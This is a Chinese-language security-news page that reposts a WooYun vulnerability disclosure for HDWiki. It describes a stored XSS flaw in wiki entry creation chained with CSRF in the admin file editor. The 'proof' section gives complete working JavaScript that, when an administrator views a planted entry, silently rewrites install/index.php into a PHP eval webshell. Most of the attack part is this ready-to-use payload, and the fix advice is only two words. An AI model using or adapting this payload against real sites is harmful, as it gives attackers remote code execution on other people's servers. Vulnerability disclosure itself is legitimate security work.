热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

HDWiki Xss+CSRF 可用GetShell 0day

发布时间:2013-10-12 14:23文章来源:wooyun文章作者:秩名 点击次数:
摘要:提交时间: 2013-07-13 10:32 公开时间: 2013-10-11 10:33 漏洞类型: xss跨站脚本攻击 危害等级: 高 详细说明: 主要两处问题: 一、前台创建词条时插入内容只是editor的js对敏感code做了客户端过滤,传入服务器后服务器端过滤不够严格,构成Xss。 二、后...

提交时间: 2013-07-13 10:32
公开时间: 2013-10-11 10:33

漏洞类型: xss跨站脚本攻击

危害等级: 高
详细说明:

主要两处问题:

一、前台创建词条时插入内容只是editor的js对敏感code做了客户端过滤,传入服务器后服务器端过滤不够严格,构成Xss。

二、后台对文件编辑时没有限制相对路径的使用,文件可以直接使用相对路径编辑(在列表里可以看到默认是绝对路径的),并且在编辑文件位置没有进行验证,构成CSRF。
漏洞证明:

具体利用Getshell:

(普通用户)前台创建词条:

	HDWiki Xss+CSRF GetShell 0day

 

 

发布,截包修改:

 

	HDWiki Xss+CSRF GetShell 0day

 

这里插入的是一个写好的JS,编辑install/index.php内容为一句话木马。

内容如下:

function ajax(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i<versions.length; i++) {

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

return request;

}

 

var _x = ajax();

 

postgo();

function postgo() {

src="http://127.0.0.1/hdwiki/index.php?admin_filemanager-edit";

data="fname=install%2Findex.php&dir=.%2F&content=%3C%3Fphp+eval%28%24_POST%5Bc%5D%29%3B%3F%3E&dosubmit=+%E7%A1%AE%E8%AE%A4%E4%BF%AE%E6%94%B9+";

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){

_x.open(_m,_s,false);

if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

_x.send(_a);

return _x.responseText;

}

 

提交发布。

(管理员账号)登陆后台:

 

	HDWiki Xss+CSRF GetShell 0day

 

查看用户创建的词条:

 

	HDWiki Xss+CSRF GetShell 0day

 

CSRF getshell:

 

	HDWiki Xss+CSRF GetShell 0day

 

修复方案:

a.过滤

b.检查

标签分类:

上一篇:shopEx 4.8.5.78660 SQL注入
下一篇:JEEBBS v3.0(最新版)漏洞几则